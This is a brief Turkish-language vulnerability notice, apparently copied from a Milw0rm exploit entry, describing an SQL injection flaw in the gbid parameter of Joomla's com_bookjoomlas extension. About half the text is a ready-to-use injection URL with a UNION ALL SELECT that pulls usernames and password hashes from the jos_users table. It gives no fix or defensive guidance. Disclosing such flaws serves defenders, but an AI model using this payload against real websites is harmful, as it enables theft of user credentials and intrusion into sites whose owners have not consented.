Joomla com_bookjoomlas SQL Inj. Açığı Hk.
Joomla script’inin com_bookjoomlas eklentisinde SQL inj. açığı tesbit edilmiştir. Tesbit edilen bu açık index.php dosyasının içindeki gbid parametresinin verileri tam olarak filitreleyememesi sebebiyle oluşmaktadır.
Bu hata, username ve kaydedilen bir kullanıcının parolasını görmesi için ayrıcalıklı bir kullanıcıya (hacker) izin verir.
Bütünüyle korunmasız sorguları seçtiği gibi, siztemdeki bazı dosyalara yazma olanağı sağlamasına sebep olur.
Örnek Injection
http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1
UNION ALL SELECT
1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16
FROM jos_users
Milw0rm: http://www.milw0rm.com/exploits/8353
|
